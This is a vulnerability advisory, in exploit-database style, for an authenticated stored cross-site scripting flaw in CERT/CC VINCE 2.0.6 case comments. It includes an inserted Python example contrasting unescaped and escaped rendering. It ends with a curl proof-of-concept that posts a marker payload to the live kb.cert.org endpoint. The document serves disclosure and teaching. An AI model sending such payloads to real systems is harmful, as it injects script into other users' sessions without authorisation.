
CMU CERT/CC VINCE 2.0.6 - Stored XSS

Author: LiquidWorm
type: webapps
platform: multiple
port: 
date_added: 2025-04-11 
date_updated: 2025-04-11 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: CMU CERT/CC VINCE 2.0.6 - Stored XSS
# Vendor: Carnegie Mellon University
# Product web page: https://www.kb.cert.org/vince/
# Affected version: <=2.0.6

Summary: VINCE is the Vulnerability Information and Coordination
Environment developed and used by the CERT Coordination Center
to improve coordinated vulnerability disclosure. VINCE is a
Python-based web platform.

Desc: The application suffers from an authenticated stored
cross-site scripting vulnerability. Input passed to the
'content' POST parameter (the body of a case comment) is not
properly sanitised before being stored and returned to users
viewing the case. This can be exploited to execute arbitrary
HTML/JS code in a user's browser session in the context of an
affected site.
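The following Python example is added here to illustrate the bug class; it is not code from the advisory or from VINCE itself, and the function names, the comment-rendering templates and the placeholder form values are assumptions. It contrasts a rendering path that interpolates the comment body raw (the vulnerable pattern) with one that HTML-escapes it first (what Django's default autoescaping does), builds the same form body as the PoC request with proper URL encoding, and checks a rendered page for the marker tag to tell an escaped reflection from an injected one.

```python
"""Added example: vulnerable vs. escaped rendering of a stored comment,
plus a check for whether the PoC marker tag survives as real markup.
All names here are illustrative and not taken from VINCE."""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Marker payload from the advisory's PoC (a harmless, easily spotted tag).
PAYLOAD = '"><marquee>ZSL</marquee>'


def render_raw(content: str) -> str:
    """Vulnerable pattern: user input concatenated into markup untouched
    (equivalent to marking the value safe in a template)."""
    return f'<div class="comment">{content}</div>'


def render_escaped(content: str) -> str:
    """Hardened pattern: escape <, >, &, and quotes before interpolation."""
    return f'<div class="comment">{html.escape(content, quote=True)}</div>'


class _TagCollector(HTMLParser):
    """Collects every start tag the browser-like parser would create."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def marker_injected(page: str, marker_tag: str = "marquee") -> bool:
    """True if the marker appears as an element (stored XSS), False if it
    only appears as escaped text."""
    parser = _TagCollector()
    parser.feed(page)
    return marker_tag in parser.tags


def build_post_body(csrf_token: str, reply_to: str, paginate_by: int = 10) -> str:
    """URL-encoded form body matching the PoC's fields; the two trailing
    newlines become %0A%0A as in the advisory. Token and reply_to values
    are placeholders supplied by the caller."""
    return urlencode({
        "content": PAYLOAD + "\n\n",
        "csrfmiddlewaretoken": csrf_token,
        "paginate_by": paginate_by,
        "reply_to": reply_to,
    })


if __name__ == "__main__":
    print("raw     :", render_raw(PAYLOAD), "->", marker_injected(render_raw(PAYLOAD)))
    print("escaped :", render_escaped(PAYLOAD), "->", marker_injected(render_escaped(PAYLOAD)))
    print("body    :", build_post_body("xxx", "xxxxx"))
```

To verify a fix rather than the bug, post the marker once and run marker_injected over the fetched case page: it should return False once the comment body is escaped or sanitised server-side.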

Tested on: nginx/1.20.0
           Django 3.2.17


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5917
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5917.php


13.01.2023

--


# Replace CASE_NO, the sessionid cookie, csrfmiddlewaretoken and reply_to
# with values taken from an authenticated session on the target.
$ curl -k https://kb.cert.org/vince/comm/post/CASE_NO \
  -H "Cookie: sessionid=xxxx" \
  -d 'content="><marquee>ZSL</marquee>%0A%0A&csrfmiddlewaretoken=xxx&paginate_by=10&reply_to=xxxxx'